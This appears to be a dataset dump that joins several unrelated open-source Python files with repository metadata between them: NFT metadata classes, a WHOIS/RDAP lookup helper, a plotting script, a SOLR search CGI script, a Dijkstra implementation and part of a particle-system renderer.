:param description: The optional description of the NFT
:param image: The optional image of the NFT
:param external_url: The optional external URL of the NFT
:param animation_url: The optional animation URL of the NFT
:param background_color: The optional background color of the NFT
:param properties: The optional properties of the NFT
"""
name: str
description: Optional[str] = None
image: Optional[str] = None
external_url: Optional[str] = None
animation_url: Optional[str] = None
background_color: Optional[str] = None
properties: Optional[Dict[str, Any]] = None
attributes: Optional[Dict[str, Any]] = None
@staticmethod
def from_json(json: Dict[str, Any]) -> "NFTMetadataInput":
return NFTMetadataInput(
json["name"],
json.get("description"),
json.get("image"),
json.get("external_url"),
json.get("animation_url"),
json.get("background_color"),
json.get("properties"),
json.get("attributes"),
)
def to_json(self) -> Dict[str, Any]:
json: Dict[str, Any] = {}
json["name"] = self.name
if self.description is not None:
json["description"] = self.description
if self.image is not None:
json["image"] = self.image
if self.external_url is not None:
json["external_url"] = self.external_url
if self.animation_url is not None:
json["animation_url"] = self.animation_url
if self.background_color is not None:
json["background_color"] = self.background_color
if self.properties is not None:
json["properties"] = self.properties
if self.attributes is not None:
json["attributes"] = self.attributes
return json
@dataclass
class NFTMetadata:
id: int
uri: str
name: str
description: Optional[str] = None
image: Optional[str] = None
external_url: Optional[str] = None
animation_url: Optional[str] = None
background_color: Optional[str] = None
properties: Optional[Dict[Any, Any]] = None
attributes: Optional[Dict[str, Any]] = None
@staticmethod
def from_json(json: Dict[str, Any]) -> "NFTMetadata":
return NFTMetadata(
json["id"],
json["uri"],
json["name"],
json.get("description"),
json.get("image"),
json.get("external_url"),
json.get("animation_url"),
json.get("background_color"),
json.get("properties"),
json.get("attributes"),
)
@dataclass
class NFTMetadataOwner:
metadata: NFTMetadata
owner: str
@dataclass
class EditionMetadata:
metadata: NFTMetadata
supply: int
@dataclass
class EditionMetadataInput:
"""
The metadata of an edition NFT to mint
:param metadata: The metadata of the edition NFT
:param supply: The supply of the edition NFT
"""
metadata: Union[NFTMetadataInput, str]
supply: int
@dataclass
class EditionMetadataOwner(EditionMetadata):
owner: str
quantity_owned: int
@dataclass
class QueryAllParams:
start: int = 0
count: int = 100
| 27.705426 | 69 | 0.628707 | 421 | 3,574 | 5.268409 | 0.159145 | 0.044184 | 0.067628 | 0.041028 | 0.359333 | 0.329125 | 0.329125 | 0.329125 | 0.329125 | 0.329125 | 0 | 0.001541 | 0.273643 | 3,574 | 128 | 70 | 27.921875 | 0.852851 | 0.181309 | 0 | 0.511364 | 0 | 0 | 0.096457 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034091 | false | 0 | 0.022727 | 0.022727 | 0.488636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f664121a0591f3c49d3c27c79769fde8a288b705 | 4,530 | py | Python | fn_whois_rdap/fn_whois_rdap/util/helper.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | fn_whois_rdap/fn_whois_rdap/util/helper.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | fn_whois_rdap/fn_whois_rdap/util/helper.py | khirazo/resilient-community-apps | 76d21d899945a5458203d6ba9cfaaf9907b395b2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# (c) Copyright IBM Corp. 2019. All Rights Reserved.
# pragma pylint: disable=unused-argument, no-self-use
import socket
from past.builtins import basestring, unicode
import tldextract
import logging
import time
import traceback
from ipwhois import IPWhois, exceptions
from datetime import date
from urllib import request
def time_str():
today = date.fromtimestamp(time.time())
timestamp = time.strftime('%H:%M:%S')
timenow = "{1} on {0}".format(today, timestamp)
return timenow
def check_input_ip(query):
"""This function checks if the input is an IP, URL or DNS
Arguments:
query {string} -- Artifact.value
Returns:
{bool, str} -- True or False, registered domain
"""
input_is_ip = True
ext = tldextract.extract(query)
if ext.registered_domain:
input_is_ip = False
return input_is_ip, ext.registered_domain
def check_registered_domain(registered_domain):
real_domain = False
try:
socket.getaddrinfo(registered_domain, None)[-1][4][0]
real_domain = True
return real_domain
except socket.gaierror as socket_error:
logging.error(traceback.format_exc())
return real_domain
# Gather registry information
def get_whois_registry_info(ip_input, proxies=None):
"""Gather registry information
Arguments:
ip_input {string} -- Artifact.value
Returns:
{object} -- Contains all registry information
"""
try:
proxy_opener = make_proxy_opener(proxies) if proxies else None
internet_protocol_address_object = IPWhois(ip_input, allow_permutations=True, proxy_opener=proxy_opener)
try:
whois_response = internet_protocol_address_object.lookup_whois()
if internet_protocol_address_object.dns_zone:
whois_response["dns_zone"] = internet_protocol_address_object.dns_zone
return whois_response
except exceptions.ASNRegistryError as e:
logging.error(traceback.format_exc())
except:
logging.error(traceback.format_exc())
def get_rdap_registry_info(ip_input, rdap_depth, proxies=None):
"""Gathers registry info in RDAP protocol
Arguments:
ip_input {string} -- Artifact.value
rdap_depth {int} -- 0,1 or 2
Returns:
{object} -- Registry info, RDAP Protocol
"""
try:
proxy_opener = make_proxy_opener(proxies) if proxies else None
internet_protocol_address_object = IPWhois(ip_input, allow_permutations=True, proxy_opener=proxy_opener)
try:
rdap_response = internet_protocol_address_object.lookup_rdap(rdap_depth)
if internet_protocol_address_object.dns_zone:
rdap_response["dns_zone"] = internet_protocol_address_object.dns_zone
return rdap_response
except exceptions.ASNRegistryError as e:
logging.error(traceback.format_exc())
except:
logging.error(traceback.format_exc())
def make_proxy_opener(proxies):
handler = request.ProxyHandler(proxies)
return request.build_opener(handler)
def check_response(response, payload_object):
if response:
response["display_content"] = dict_to_json_str(response)
results = payload_object.done(True, response)
else:
results = payload_object.done(False, response)
return results
def dict_to_json_str(d):
"""Function that converts a dictionary into a JSON string.
Supports types: basestring, bool, int and nested dicts.
Does not support lists.
If the value is None, it sets it to False."""
json_entry = u'"{0}":{1}'
json_entry_str = u'"{0}":"{1}"'
entries = []
for entry in d:
key = entry
value = d[entry]
if value is None:
value = False
if isinstance(value, list):
pass
if isinstance(value, basestring):
value = value.replace(u'"', u'\\"')
entries.append(json_entry_str.format(unicode(key), unicode(value)))
elif isinstance(value, unicode):
entries.append(json_entry.format(unicode(key), unicode(value)))
elif isinstance(value, bool):
value = 'true' if value else 'false'
entries.append(json_entry.format(key, value))
elif isinstance(value, int):
entries.append(json_entry.format(unicode(key), value))
elif isinstance(value, dict):
entries.append(json_entry.format(key, dict_to_json_str(value)))
return u'{0} {1} {2}'.format(u'{', ','.join(entries), u'}')
| 31.901408 | 112 | 0.678587 | 567 | 4,530 | 5.216931 | 0.275132 | 0.033469 | 0.062204 | 0.078431 | 0.405003 | 0.361731 | 0.288032 | 0.242055 | 0.210277 | 0.210277 | 0 | 0.00569 | 0.224062 | 4,530 | 141 | 113 | 32.12766 | 0.835846 | 0.179912 | 0 | 0.247191 | 0 | 0 | 0.0266 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089888 | false | 0.011236 | 0.101124 | 0 | 0.292135 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f66596fd7558631f8b9f361150e7e02c8bbae04c | 2,086 | py | Python | unity-environment/Learning/plot_with_std.py | KooroshNaderi/UnityClimberAgent | 1953dc6786872304a2fd19140f685895557ad052 | [
"Apache-2.0"
] | null | null | null | unity-environment/Learning/plot_with_std.py | KooroshNaderi/UnityClimberAgent | 1953dc6786872304a2fd19140f685895557ad052 | [
"Apache-2.0"
] | 6 | 2019-12-23T21:43:11.000Z | 2022-02-10T00:40:39.000Z | unity-environment/Learning/plot_with_std.py | KooroshNaderi/UnityClimberAgent | 1953dc6786872304a2fd19140f685895557ad052 | [
"Apache-2.0"
] | null | null | null | '''
Created on Oct 4, 2017
@author: amin
'''
from __future__ import division, print_function
from matplotlib import pyplot as plt
import numpy as np
import matplotlib
import os
# Set some parameters to apply to all plots. These can be overridden
# in each plot if desired
# Plot size to 14" x 7"
matplotlib.rc('figure', figsize=(14, 7))
# Font size to 14
matplotlib.rc('font', size=14)
# Do not display top and right frame lines
matplotlib.rc('axes.spines', top=False, right=False)
# Remove grid lines
matplotlib.rc('axes', grid=False)
# Set background color to white
matplotlib.rc('axes', facecolor='white')
dir_list = [
'baseline_no_learning',
]
dir_size = 10
plot_whole_data = False
legends = []
for d in range(len(dir_list)):
data = None
for root, dirs, file_names in os.walk(os.path.join('results', dir_list[d])):
for f in range(dir_size):
new_data = np.genfromtxt(os.path.join(root, file_names[f]))
if data is None:
data = np.zeros((new_data.shape[0], dir_size))
data[:, f] = new_data
mean = np.mean(data, axis=1)
std = np.std(data, axis=1)
if plot_whole_data:
p = plt.plot(list(range(data.shape[0])), mean)
plt.fill_between(list(range(data.shape[0])), mean - std / 2, mean + std / 2, color=p[0].get_color(), alpha=0.3)
else:
step = 1000
idx = np.arange(0, data.shape[0], step)
mean_smooth = np.zeros(len(idx))
std_smooth = np.zeros(len(idx))
for i in range(len(idx)):
mean_smooth[i] = np.mean(mean[i * step: (i + 1) * step])
std_smooth[i] = np.mean(std[i * step: (i + 1) * step])
p = plt.plot(idx, mean_smooth)
# plt.fill_between(idx, mean_smooth-std_smooth/2, mean_smooth+std_smooth/2, color=p[0].get_color(), alpha=0.3)
legends.append(dir_list[d][dir_list[d].rfind('/') + 1:])
plt.legend(legends)
plt.title('State cost + control cost in 10 minutes of simulation (bipedal walking task)')
plt.xlabel('Frame index')
plt.ylabel('State Cost + Control Cost')
# plt.yscale('log')
plt.show()
| 33.111111 | 119 | 0.645733 | 338 | 2,086 | 3.87574 | 0.37574 | 0.045802 | 0.030534 | 0.032061 | 0.145802 | 0.070229 | 0.035115 | 0.035115 | 0.035115 | 0 | 0 | 0.026029 | 0.208054 | 2,086 | 62 | 120 | 33.645161 | 0.766949 | 0.183605 | 0 | 0 | 0 | 0 | 0.103142 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.113636 | 0 | 0.113636 | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f666a22d035d3d4a25437e0747c3477add75b192 | 3,373 | py | Python | docker/laaws-demo-webui/cgi-bin/text-search.py | lockss/laaws-demo | f7aeb1b3a15f5955ae7ab41b64b5e45d07e0433e | [
"BSD-3-Clause"
] | null | null | null | docker/laaws-demo-webui/cgi-bin/text-search.py | lockss/laaws-demo | f7aeb1b3a15f5955ae7ab41b64b5e45d07e0433e | [
"BSD-3-Clause"
] | null | null | null | docker/laaws-demo-webui/cgi-bin/text-search.py | lockss/laaws-demo | f7aeb1b3a15f5955ae7ab41b64b5e45d07e0433e | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
import requests
import json
import cgi
import cgitb
import sys
cgitb.enable(display=0, logdir="/usr/local/apache2/logs/cgitb")
# URL prefix for SOLR query service
# XXX should work with both EDINA and BL
service = "http://laaws-indexer-solr:8983/solr/test-core/select"
# URL prefix for OpenWayback
wayback = "http://demo.laaws.lockss.org:8080/wayback/*"
message = 'Content-Type:text/html' + '\n\n' + '<h1>Text Search</h1>\n'
redirectTo = None
urlArray = []
# return a Dictionary with the query params
def queryParams(s):
if 'Search' in s:
ret = {}
ret['q'] = s["Search"].value
ret['indent'] = "on"
ret['wt'] = "json"
else:
ret = None
return ret
try:
if(len(sys.argv) > 1):
# Run from command line
params = {}
params['q'] = sys.argv[1]
params['indent'] = "on"
params['wt'] = "json"
else:
# get data from web page form
input_data=cgi.FieldStorage()
# convert to SOLR query params
params = queryParams(input_data)
if params != None:
message = message + "SOLR search for {}<br />\n<br />\n".format(params['q'])
# query the service
solrResponse = requests.get(service, params=params)
status = solrResponse.status_code
if(status == 200):
# parse the JSON we got back
solrData = solrResponse.json()
# XXX response is paginated
if "response" in solrData and "docs" in solrData["response"]:
docs = solrData["response"]["docs"]
if(len(docs) < 1 or docs[0] == None):
message = message + "docs is empty"
else:
for doc in docs:
url = None
if "response_url" in doc:
url = doc["response_url"][0]
elif "url" in doc:
url = doc["url"]
if url != None:
urlArray.append(url)
else:
message = message + "No docs found\n"
else:
# SOLR search query unsuccessful
message = message + "SOLR service response: {}\n".format(status)
else:
# No search data from form
message = message + "No search string from form\n"
if(len(urlArray) == 1):
message = "Location: {}".format(urlArray[0]) + '\n'
elif len(urlArray) > 1:
# multiple urls, create page of links
message = message + '<ol>\n'
# Sorted neede to ensure consistent output order for testing
for url in sorted(urlArray):
message = message + '<li><a href="{0}/{1}">'.format(wayback,url) + "{}</a></li>\n".format(url)
message = message + "</ol>\n"
else:
message = message + "<br />\nError: No URLs returned\n"
except requests.exceptions.ConnectTimeout:
message = message + 'Timeout connecting to DOI resolution service {}\n'.format(service)
except requests.exceptions.ConnectionError:
message = message + 'Cannot connect to DOI resolution service {}\n'.format(service)
except:
e = sys.exc_info()
try:
message = message + cgitb.text(e)
except AttributeError:
message = message + "Got AttributeError: {}\n".format(e[0])
print(message)
| 35.505263 | 106 | 0.558257 | 401 | 3,373 | 4.680798 | 0.36409 | 0.096963 | 0.012786 | 0.011721 | 0.05967 | 0.044752 | 0.044752 | 0.044752 | 0 | 0 | 0 | 0.011693 | 0.315446 | 3,373 | 94 | 107 | 35.882979 | 0.801213 | 0.137563 | 0 | 0.121622 | 0 | 0 | 0.209744 | 0.017623 | 0.013514 | 0 | 0 | 0 | 0 | 1 | 0.013514 | false | 0 | 0.067568 | 0 | 0.094595 | 0.013514 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f66747f467bda95dc0b3cabad44bd181726ed982 | 4,682 | py | Python | src/Dijkstra.py | CATHY0706/Dijkstra_tsp | efbfe88410d2dfa8b5f25f0b85e9309d283dbfeb | [
"Apache-2.0"
] | null | null | null | src/Dijkstra.py | CATHY0706/Dijkstra_tsp | efbfe88410d2dfa8b5f25f0b85e9309d283dbfeb | [
"Apache-2.0"
] | null | null | null | src/Dijkstra.py | CATHY0706/Dijkstra_tsp | efbfe88410d2dfa8b5f25f0b85e9309d283dbfeb | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: Tianyi Zhang and Botao Gao
Created on Tue Dec 1st 14:03:37 2020
Based on the code found in tutorial at this website: 'https://blog.csdn.net/u014798883/article/details/106200697'
"""
def dijkstra(adjacency_matrix, start, path, cost, max):
"""
Solve the shortest path problem with Dijkstra's algorithm.
:param adjacency_matrix: A two-dimensional array (an adjacency matrix), which used to represent indicate whether pairs
of vertices are adjacent or not in the graph.
:param start: starting node, input by user, int type
:param path:transit point, the previous node of the node vi.
:param cost: the shortest known path length from V0 to Vi
:param max: int type, an infinite number, usually represented by 10000
mid_node: transit point, take the shortest path from V0 to Vi as the transit point.
next_node: centering on the transit point, try to optimize the path. To check whether the path which next_node
direct to V0 or the path which passes mid_node to V0 is better.
check_node: Index, searching for the shortest path point in the cost array. The shortest point will be assigned
to mid_node as a transit point.
:return path: the shortest path
"""
# get the size of the adjacency matrix
length = len(adjacency_matrix)
# Initialize the p array to 0, to mark whether the point has been added to the shortest path
p = [0] * length
# Initialize path,cost,p
for i in range(length):
if i == start:
# set the start node as 1
p[start] = 1
else:
# cost[i]: Get the cost of reaching other points directly from the starting point
cost[i] = adjacency_matrix[start][i]
# if cannot reach the starting point directly, set as -1
path[i] = (start if (cost[i] < max) else -1)
# print p, cost, path
# Traverse all points (excluding the starting point)
for i in range(1, length):
# Maximum initial value
min_cost = max
mid_node = -1
# Search for a point closest to the starting point v0 as a transit point mid_node
for check_node in range(length):
if p[check_node] == 0 and cost[check_node] < min_cost:
# If it is found that the cost of passing a transit point is less than the minimum cost
# then update the min_cost and check_node
min_cost = cost[check_node]
mid_node = check_node
# If the path with a cost less than the minimum cost cannot be found, jump out of the loop
if mid_node == -1:
break
# If the path with a cost less than the minimum cost has been found, add the check_node to the shortest path
p[mid_node] = 1
# for loop: Update the cost and path of other nodes
for next_node in range(length):
# Check all points next_node which are not traversed
# Check the influence of mid_node (which has been added to the path in the previous step) on next_node
# If the total cost is less than the existing minimum cost, update the path and cost array
if p[next_node] == 0 and (adjacency_matrix[mid_node][next_node] + cost[mid_node] < cost[next_node]):
# update cost
cost[next_node] = adjacency_matrix[mid_node][next_node] + cost[mid_node]
# update path
path[next_node] = mid_node
# return the shortest path
return path
if __name__ == '__main__':
maximum = 10000
G = [
# this is the area for you to enter your adjacency matrix
[0, 294, 1076, 1021, 10000, 10000, 10000, 10000],
[294, 0, 794, 906, 896, 10000, 10000, 10000],
[1076, 794, 0, 1106, 740, 743, 10000, 10000],
[1021, 906, 1106, 0, 536, 10000, 1362, 10000],
[10000, 896, 740, 536, 0, 1141, 985, 1566],
[10000, 10000, 743, 10000, 1141, 0, 1582, 894],
[10000, 10000, 10000, 1362, 985, 1582, 0, 1342],
[10000, 10000, 10000, 10000, 1566, 894, 1342, 0]
# this is the area for you to enter your adjacency matrix
]
# enter your starting node here
start_node = 0
path = [0] * len(G)
cost = [0] * len(G)
print('The shortest path:', dijkstra(G, start_node, path, cost, maximum))
print('The cost to each node:', cost)
| 44.590476 | 124 | 0.602307 | 676 | 4,682 | 4.093195 | 0.279586 | 0.035417 | 0.043368 | 0.019516 | 0.122515 | 0.091073 | 0.091073 | 0.091073 | 0.091073 | 0.061438 | 0 | 0.093898 | 0.324434 | 4,682 | 104 | 125 | 45.019231 | 0.780904 | 0.519436 | 0 | 0 | 0 | 0 | 0.023426 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0 | 0 | 0.04878 | 0.04878 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f6715c20809e2e51e6fcf8fa73b5bb43564256b6 | 29,278 | py | Python | game/particle/p4system.py | Sipondo/ulix-dexflow | de46482fe08e3d600dd5da581f0524b55e5df961 | [
"MIT"
] | 5 | 2021-06-25T16:44:38.000Z | 2021-12-31T01:29:00.000Z | game/particle/p4system.py | Sipondo/ulix-dexflow | de46482fe08e3d600dd5da581f0524b55e5df961 | [
"MIT"
] | null | null | null | game/particle/p4system.py | Sipondo/ulix-dexflow | de46482fe08e3d600dd5da581f0524b55e5df961 | [
"MIT"
] | 1 | 2021-06-25T20:33:47.000Z | 2021-06-25T20:33:47.000Z | import moderngl
from .p4dyna.equation import Equation
from numpy.random import random
class ParticleSystem:
def __init__(self, game, brender, fname, target, miss, move_data):
self.game = game
self.brender = brender # meh
self.N = 500000
self.particles = 0
self.fname = fname
self.target = target
self.miss = miss
self.move_data = move_data
# TODO: convert to proper change
self.basis = (-1.0, 1.0, 1.0) if self.target[0] == 0 else (1.0, 1.0, 1.0)
print("Target:", self.target, self.basis)
# TODO: temp
self.time_alive = -0.8
self.step_count = self.time_alive
self.warp = 1
self.step_warp = 1
self.step_size = self.game.m_par.step_size * self.step_warp
self.emitters = []
self.renderers = []
self.miscs = []
self.equations = {}
self.transformer = None
self.load_context_objects()
self.spawn_elements()
def on_tick(self, time, frame_time):
if (not self.particles) and self.time_alive > 1:
return False
for eq in self.equations.values():
eq.reset_eval()
frame_time *= self.warp * (3 if self.game.m_par.fast_forward else 1)
self.step_size = self.game.m_par.step_size * self.step_warp
self.time_alive += frame_time
time = self.time_alive
self.step_count += frame_time
steps = 0
if self.step_count > self.step_size:
# # Matrix
# self.warp = max(0.1, self.warp * 0.995)
# self.step_warp = self.warp
steps = int(self.step_count // self.step_size)
self.step_count = self.step_count % self.step_size
for _ in range(steps):
self.transformer.render(time, self.step_size)
for emitter in self.emitters:
emitter.render(time, self.step_size)
self.switch_buffers()
for misc in self.miscs:
misc.render(time)
self.render(time, frame_time)
# print(time)
# if steps:
# self.switch_buffers()
return True
def render(self, time, frame_time):
# Solid
self.game.m_par.set_render(1)
for renderer in (x for x in self.renderers if x.equation == 1):
renderer.render(time, frame_time)
# Alpha
self.game.m_par.set_render(2)
for renderer in (x for x in self.renderers if x.equation == 2):
renderer.render(time, frame_time)
# Anti
self.game.m_par.set_render(4)
for renderer in (x for x in self.renderers if x.equation == 3):
renderer.render(time, frame_time)
self.game.m_par.set_render(3)
def r(self, owner, name, parse=True, throw=True):
name = f"field_{name}"
if name in owner.params:
v = owner.params[name]
if parse and "!" in str(v):
return self.p(v)
elif "?" in str(v):
return v.replace("?key?", "key")
return v
if throw:
raise UnboundLocalError(f"Entry is missing named: {name}.")
return "0"
def switch_buffers(self):
self.vbo1, self.vbo2 = self.vbo2, self.vbo1
for renderer in self.renderers:
renderer.switch_buffers()
self.transformer.switch_buffers()
err = self.game.ctx.error
if err != "GL_NO_ERROR":
print(err)
def load_context_objects(self):
self.vbo1 = self.game.ctx.buffer(reserve=self.N * self.game.m_par.stride)
self.vbo2 = self.game.ctx.buffer(reserve=self.N * self.game.m_par.stride)
def spawn_elements(self):
js = self.game.m_res.get_particle(self.fname, self.move_data)
self.transformer = Transformer(self.game, self)
stage_dict = {}
for node in js["nodes"]:
if node["title"] == "Stage":
stage = node["content"]["field_stage"]
for output in node["outputs"]:
stage_dict[output["id"]] = stage
filters = set()
for node in js["nodes"]:
if node["title"][:6].lower() == "filter":
for output in node["outputs"]:
filters.add(output["id"])
filters = list(filters)
filter_edge_dict = {}
for edge in js["edges"]:
if edge["start"] in filters:
filter_edge_dict[edge["end"]] = edge["start"]
if edge["end"] in filters:
filter_edge_dict[edge["start"]] = edge["end"]
edge_dict = {}
for edge in js["edges"]:
if edge["start"] in stage_dict.keys():
edge_dict[edge["end"]] = stage_dict[edge["start"]]
if edge["end"] in stage_dict.keys():
edge_dict[edge["start"]] = stage_dict[edge["end"]]
for i, letter in enumerate("xyz"):
self.equations[f"user_{letter}"] = Equation(
self,
f"user_{letter}",
f"self.system.brender.get_loc_fighter({1 if self.target[0] == 0 else 0}, {self.basis})[{i}]",
)
self.equations[f"target_{letter}"] = Equation(
self,
f"target_{letter}",
f"self.system.brender.get_loc_fighter({0 if self.target[0] == 0 else 1}, {self.basis})[{i}]",
)
for node in js["nodes"]:
if node["title"] == "Equation":
# print(node["title"])
self.add_equation(node)
for node in js["nodes"]:
# print(node)
if node["title"] == "Emit":
# print(node["title"])
stage = int(edge_dict[node["inputs"][0]["id"]])
self.emitters.append(Emitter(self.game, self, node, stage))
elif node["title"] == "Trigger":
# print(node["title"])
self.miscs.append(Trigger(self.game, self, node))
elif node["title"] == "Actor":
# print(node["title"])
self.miscs.append(Actor(self.game, self, node))
elif node["title"] == "Camera":
# print(node["title"])
self.miscs.append(Camera(self.game, self, node))
elif node["title"] == "Equation":
pass
elif node["title"] == "Render":
# print(node["title"])
stage = int(edge_dict[node["inputs"][0]["id"]])
self.renderers.append(Renderer(self.game, self, node, stage))
for node in js["nodes"]:
if node["title"].lower()[:3] == "geo":
# print("geo")
# print(node["title"])
id = node["inputs"][0]["id"]
if id in edge_dict:
# print("stagebound")
stage = int(edge_dict[id])
self.transformer.add_geoblock(node, None, stage)
else:
# print("filterbound")
filter = int(filter_edge_dict[id])
self.transformer.add_geoblock(node, filter, None)
for node in js["nodes"]:
if node["title"][:6].lower() == "filter":
# print(node["title"])
# print(node["inputs"])
stage_in = int(
edge_dict[
[x for x in node["inputs"] if x["socket_type"] == 3][0]["id"]
]
)
stage_out = int(
edge_dict[
[x for x in node["inputs"] if x["socket_type"] == 0][0]["id"]
]
)
self.transformer.add_geoblock(node, None, stage_in, stage_out)
self.transformer.load_programs()
self.transformer.load_context_objects()
def add_equation(self, params):
self.params = params["content"] # meh
self.equations[self.r(self, "label")] = Equation(
self,
self.r(self, "label", parse=False),
self.r(self, "equation", parse=False),
)
def p(self, q, parse=True):
if "!" in q:
for key, value in self.equations.items():
if f"!{key}!" in q:
q = q.replace(f"!{key}!", str(value.get(self.time_alive)))
if parse:
return eval(q)
return q
class Emitter:
def __init__(self, game, system, params, stage):
self.game = game
self.system = system
self.N = self.system.N
self.params = params["content"]
self.title = "Emitter"
self.stage = stage
self.emit_want = 0
self.counters = 0
self.alive = True
self.load_programs()
self.load_context_objects()
self.set_fields()
def set_fields(self):
self.delay = float(self.system.r(self, "delay"))
self.emit_count = float(self.system.r(self, "count"))
self.duration = float(self.system.r(self, "duration"))
self.prog_emit["Stage"] = self.stage
self.prog_emit["Position"] = (
float(self.system.r(self, "pos_x"))
+ float(self.system.r(self, "vel_x")) / 45,
float(self.system.r(self, "pos_y"))
+ float(self.system.r(self, "vel_y")) / 45,
float(self.system.r(self, "pos_z"))
+ float(self.system.r(self, "vel_z")) / 45,
)
self.prog_emit["Position_sway"] = (
float(self.system.r(self, "pos_range_x"))
+ float(self.system.r(self, "vel_x")) / 45,
float(self.system.r(self, "pos_range_y"))
+ float(self.system.r(self, "vel_y")) / 45,
float(self.system.r(self, "pos_range_z"))
+ float(self.system.r(self, "vel_z")) / 45,
)
self.prog_emit["Position_radial"] = False
self.prog_emit["Velocity"] = (
float(self.system.r(self, "vel_x")),
float(self.system.r(self, "vel_y")),
float(self.system.r(self, "vel_z")),
)
self.prog_emit["Velocity_sway"] = (
float(self.system.r(self, "vel_range_x")),
float(self.system.r(self, "vel_range_y")),
float(self.system.r(self, "vel_range_z")),
)
self.prog_emit["Velocity_radial"] = False
self.prog_emit["Size"] = float(self.system.r(self, "size"))
self.prog_emit["Size_sway"] = float(self.system.r(self, "size_range"))
self.prog_emit["Colour"] = (
float(self.system.r(self, "col_r")),
float(self.system.r(self, "col_g")),
float(self.system.r(self, "col_b")),
)
self.prog_emit["Colour_sway"] = (
float(self.system.r(self, "col_range_r")),
float(self.system.r(self, "col_range_g")),
float(self.system.r(self, "col_range_b")),
)
self.prog_emit["Rotation"] = float(self.system.r(self, "rot"))
self.prog_emit["Rotation_sway"] = float(self.system.r(self, "rot_range"))
self.prog_emit["Rotation_velocity"] = float(self.system.r(self, "rot_vel"))
self.prog_emit["Rotation_velocity_sway"] = float(
self.system.r(self, "rot_vel_range")
)
self.prog_emit["Life"] = float(self.system.r(self, "life"))
self.prog_emit["Life_sway"] = float(self.system.r(self, "life_range"))
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def on_exit(self):
pass
def load_programs(self):
self.prog_emit = self.game.m_res.get_program_varyings(
"p4_emit_ver", varyings=self.game.m_par.get_varyings(),
)
def load_context_objects(self):
self.vao_emit = self.game.ctx._vertex_array(self.prog_emit, [])
def render(self, time, frame_time):
self.set_fields()
emit_count = 0
self.counters += frame_time
# self.active_particles = 0
if self.delay < self.counters < self.delay + self.duration:
self.emit_want += self.emit_count * frame_time
emit_count = int(min(self.N - self.system.particles, self.emit_want))
if emit_count > 0: # and not int(time * 6) % 10:
self.emit_want -= emit_count
self.prog_emit["time"].value = max(time, 0) + random() / 50
with self.game.query:
self.vao_emit.transform(
self.system.vbo2,
vertices=emit_count,
buffer_offset=self.system.particles * self.game.m_par.stride,
)
# print(self.system.particles, emit_count, self.game.query.primitives)
self.system.particles += self.game.query.primitives
# print(self.system.particles)
# print(
# f"Emitting on {self.counters} for {frame_time}, {emit_count} particles {self.active_particles}."
# )`
class Renderer:
def __init__(self, game, system, params, stage):
self.game = game
self.system = system
self.N = self.system.N
self.params = params["content"]
self.stage = stage
self.title = "Renderer"
eqname = self.system.r(self, "equation").strip().lower()
self.equation = 1 if eqname == "solid" else 3 if eqname == "anti" else 2
# TODO: temp
self.texture = self.game.m_res.get_texture(
"particle", self.system.r(self, "file")
)
self.load_programs()
self.load_context_objects()
self.set_fields()
self.step_quantity = self.game.m_par.step_quantity
# TODO TEMP
self.texture_noise = self.game.m_res.get_noise()
self.prog["Size"].value = 1.0
self.prog["Stage"] = stage
self.prog["Basis"] = self.system.basis
self.vao_receive_dict = {}
self.buffer_requests = []
self.current_active_buffer = 1
self.prog["texture0"] = 0
self.prog["texturearray1"] = 10
self.prog["Usenoise"] = self.equation != 1
self.rotvel = bool(self.system.r(self, "rotvel"))
self.noise_speed = 0
self.noise_id = 0
def set_fields(self):
self.opacity = float(self.system.r(self, "opacity"))
self.noise_speed = float(self.system.r(self, "noise"))
def load_programs(self):
# Renders particle to the screen
self.prog = self.game.m_res.get_program("p4_render")
def load_context_objects(self):
# Render vaos. The render to screen version of the tranform vaos above
self.vao1_rend = self.game.ctx.vertex_array(
self.prog, [self.game.m_par.vao_def(self.system.vbo1, render=True)],
)
self.vao2_rend = self.game.ctx.vertex_array(
self.prog, [self.game.m_par.vao_def(self.system.vbo2, render=True)],
)
def render(self, time, frame_time):
self.set_fields()
self.prog["CameraPosition"] = self.game.m_cam.pos
self.noise_id = (
time * self.step_quantity * 2 * self.noise_speed
) % 5680 # 710 * 8
